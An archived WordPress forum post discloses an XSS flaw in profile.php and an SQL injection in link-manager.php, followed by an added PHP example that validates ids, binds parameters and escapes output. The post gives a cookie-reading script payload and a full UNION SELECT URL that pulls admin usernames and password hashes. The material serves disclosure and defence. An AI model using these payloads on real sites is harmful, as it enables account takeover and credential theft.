Title: XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php
Last modified: August 18, 2016

---

# XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php

 *  [kreon](https://wordpress.org/support/users/kreon/)
 * (@kreon)
 * [21 years, 3 months ago](https://wordpress.org/support/topic/xss-attack-in-wp-adminprofilephp-038-sql-bug-in-wp-adminlink-managerphp/)
 * ==XSS==

   Module: wp-admin/profile.php

   Fields: Last Name, First Name. You can enter some bad HTML code like `<script>alert(document.cookie)</script>` in these fields.

   Description and path: [http://adz.void.ru/?p=5](http://adz.void.ru/?p=5)

   (C) ADZ Security Team

   ==SQL==

   Module: wp-admin/link-manager.php

   Example: [http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit](http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit)

   Description and path: [http://adz.void.ru/?p=6](http://adz.void.ru/?p=6)

   (C) ADZ Security Team

   ==CONTACT==

   [http://adz.void.ru](http://adz.void.ru)

   kre0n@mail.ru

   icq: 332757541

   irc: #adz @ irc.uvao.net

The topic ‘XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 0 replies
 * 1 participant
 * Last reply from: [kreon](https://wordpress.org/support/users/kreon/)
 * Last activity: [21 years, 3 months ago](https://wordpress.org/support/topic/xss-attack-in-wp-adminprofilephp-038-sql-bug-in-wp-adminlink-managerphp/)
 * Status: not resolved
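
The two issues reported above come down to an id parameter reaching SQL unvalidated and profile fields reaching HTML unescaped. The following is an added example, not code from the post or from WordPress: it shows one way to handle both in plain PHP. The function names, the reduced `wp_links` schema and the in-memory SQLite database (requires `pdo_sqlite`) are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not WordPress core code.

// Strict parsing for an id parameter such as link_id.
// Returns the id, or null when the value is not a plain positive integer.
function parse_link_id(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look up a link with a bound parameter, so the id never becomes SQL text.
function fetch_link(PDO $db, string $raw_id): ?array {
    $id = parse_link_id($raw_id);
    if ($id === null) {
        return null; // reject the request instead of querying
    }
    $stmt = $db->prepare(
        'SELECT link_id, link_url, link_name FROM wp_links WHERE link_id = ?'
    );
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Escape a profile field for output as element content or a quoted attribute.
function escape_profile_field(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample data; the real table has more columns.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_links (link_id INTEGER PRIMARY KEY, link_url TEXT, link_name TEXT)');
$db->exec("INSERT INTO wp_links VALUES (1, 'https://example.org/', 'Example')");

// A well-formed id is looked up normally.
var_dump(fetch_link($db, '1'));

// Abbreviated form of the link_id value from the report: it is not an
// integer, so fetch_link() returns before any statement is prepared.
var_dump(fetch_link($db, '31337 UNION SELECT ID,user_login,user_pass FROM wp_users'));

// The name value from the report is emitted as inert text, not markup.
echo escape_profile_field('<script>alert(document.cookie)</script>'), "\n";
```

Validation and the bound parameter are deliberately layered: either one alone stops the reported `link_id` value, and keeping both means a later change to one does not reopen the query.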
